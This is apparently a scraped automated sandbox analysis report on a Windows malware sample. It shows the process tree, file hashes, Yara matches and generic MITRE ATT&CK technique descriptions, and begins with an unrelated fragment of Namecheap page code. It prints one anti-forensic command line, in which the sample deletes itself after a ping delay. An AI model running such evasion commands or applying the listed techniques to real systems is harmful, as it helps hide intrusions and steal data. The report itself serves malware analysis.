charset="UTF-8"/><title>Registrant WHOIS contact information verification \| Namecheap.com</title><meta name="viewport" content="width=device-width, initial-scale=1"/><link rel="shortcut icon" href="https://www.namecheap.com/assets/img/nc-icon/favicon.ico"/><script type="text/javascript">var nc_mainLegacy=function(t){function n(r){if(e[r])return e[r].exports;var i=e[r]={i:r,l:!1,exports:{}};return t[r].call(i.exports,i,i.exports,n),i.l=!0,i.exports}var e={};return n.m=t,n.c=e,n.d=function(t,e,r){n.o(t,e)\|\|Object.defineProperty(t,e,{configurable:!1,enumerable:!0,get:r})},n.n=function(t){var e=t&&t.__esModule?function(){return t.default}:function(){return t};return n.d(e,"a",e),e},n.o=function(t,n){return Object.prototype.hasOwnProperty.call(t,n)},n.p="",n(n.s=273)}([function(t,n,e){var r=e(3),i=e(15),o=e(10),a=e(11),u=e(16),s=function(t,n,e){var

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: aOn5CfTiwS.exe PID: 4088 Parent PID: 5660

General

Start time:	18:07:03
Start date:	30/01/2021
Path:	C:\Users\user\Desktop\aOn5CfTiwS.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\aOn5CfTiwS.exe'
Imagebase:	0x400000
File size:	5007872 bytes
MD5 hash:	013EBA0050EBE18E39978E89A56C0FAB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000000.00000002.265213011.0000000010249000.00000004.00000001.sdmp, Author: Florian Roth Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000000.00000002.261758124.0000000002880000.00000040.00000001.sdmp, Author: Florian Roth
Reputation:	low

Analysis Process: 1612058829275.exe PID: 5644 Parent PID: 4088

General

Start time:	18:07:09
Start date:	30/01/2021
Path:	C:\Users\user\AppData\Roaming\1612058829275.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\1612058829275.exe' /sjson 'C:\Users\user\AppData\Roaming\1612058829275.txt'
Imagebase:	0x400000
File size:	103632 bytes
MD5 hash:	EF6F72358CB02551CAEBE720FBC55F95
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 3%, Metadefender, Browse Detection: 14%, ReversingLabs
Reputation:	moderate

Analysis Process: ThunderFW.exe PID: 5436 Parent PID: 4088

General

Start time:	18:07:15
Start date:	30/01/2021
Path:	C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
Imagebase:	0x950000
File size:	73160 bytes
MD5 hash:	F0372FF8A6148498B19E04203DBB9E69
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 3%, Metadefender, Browse Detection: 2%, ReversingLabs
Reputation:	moderate

Analysis Process: cmd.exe PID: 460 Parent PID: 4088

General

Start time:	18:07:29
Start date:	30/01/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\aOn5CfTiwS.exe'
Imagebase:	0x1120000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 5288 Parent PID: 460

General

Start time:	18:07:29
Start date:	30/01/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: PING.EXE PID: 5352 Parent PID: 460

General

Start time:	18:07:29
Start date:	30/01/2021
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping 127.0.0.1 -n 3
Imagebase:	0xfa0000
File size:	18944 bytes
MD5 hash:	70C24A306F768936563ABDADB9CA9108
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Digital certificate logs, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	API monitoring, File monitoring, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report aOn5CfTiwS

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Cryptography:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre